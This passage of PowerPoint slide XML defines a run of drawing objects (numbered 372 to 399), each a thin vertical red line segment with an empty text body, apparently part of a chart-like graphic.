          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="372" name="object 372"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5735340" y="5702927"/>
            <a:ext cx="0" cy="284387"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="143510">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="143322"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="373" name="object 373"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5735340" y="5699953"/>
            <a:ext cx="0" cy="290679"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="146685">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="146324"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8608">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="374" name="object 374"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5755175" y="5830657"/>
            <a:ext cx="0" cy="157294"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="79375">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="78866"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="375" name="object 375"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5755175" y="5827683"/>
            <a:ext cx="0" cy="162327"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="81914">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="81868"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8608">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="object 376"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5775007" y="5780676"/>
            <a:ext cx="0" cy="206367"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="104139">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="104088"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="377" name="object 377"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5775007" y="5777701"/>
            <a:ext cx="0" cy="212659"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="107314">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="107090"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8608">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="378" name="object 378"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5795236" y="5797340"/>
            <a:ext cx="0" cy="190011"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="95885">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="95679"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="379" name="object 379"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5795236" y="5794363"/>
            <a:ext cx="0" cy="196302"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="99060">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="98682"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="380" name="object 380"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5815068" y="5719592"/>
            <a:ext cx="0" cy="268028"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="135255">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="134913"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="381" name="object 381"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5815068" y="5716616"/>
            <a:ext cx="0" cy="274320"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="138430">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="137916"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="382" name="object 382"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5834902" y="5830657"/>
            <a:ext cx="0" cy="157294"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="79375">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="78866"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="383" name="object 383"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5834902" y="5827683"/>
            <a:ext cx="0" cy="162327"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="81914">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="81868"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="384" name="object 384"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5854735" y="5686272"/>
            <a:ext cx="0" cy="300745"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="151764">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="151727"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385" name="object 385"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5854735" y="5683297"/>
            <a:ext cx="0" cy="307037"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="154939">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="154729"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386" name="object 386"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5874569" y="5836209"/>
            <a:ext cx="0" cy="151002"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="76200">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="76064"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387" name="object 387"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5874569" y="5833235"/>
            <a:ext cx="0" cy="157294"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="79375">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="79067"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="388" name="object 388"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5894402" y="5702927"/>
            <a:ext cx="0" cy="284387"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="143510">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="143322"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389" name="object 389"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5894402" y="5699953"/>
            <a:ext cx="0" cy="290679"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="146685">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="146324"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="390" name="object 390"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5914236" y="5791781"/>
            <a:ext cx="0" cy="196302"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="99060">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="98484"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="391" name="object 391"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5914236" y="5788806"/>
            <a:ext cx="0" cy="201336"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="101600">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="101487"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="392" name="object 392"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5934068" y="5675162"/>
            <a:ext cx="0" cy="312070"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="157480">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="157334"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="393" name="object 393"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5934068" y="5672187"/>
            <a:ext cx="0" cy="318362"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="160655">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="160336"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="394" name="object 394"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5953903" y="5802891"/>
            <a:ext cx="0" cy="184977"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="93344">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="92878"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="395" name="object 395"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5953903" y="5799916"/>
            <a:ext cx="0" cy="190011"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="95885">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="95880"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="396" name="object 396"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5973735" y="5730695"/>
            <a:ext cx="0" cy="256701"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="129539">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="129310"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="397" name="object 397"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5973735" y="5727720"/>
            <a:ext cx="0" cy="262995"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="132714">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="132312"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="398" name="object 398"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5993569" y="5736246"/>
            <a:ext cx="0" cy="251670"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="127000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="126508"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="399" name="object 399"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5993569" y="5733273"/>
            <a:ext cx="0" cy="256701"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
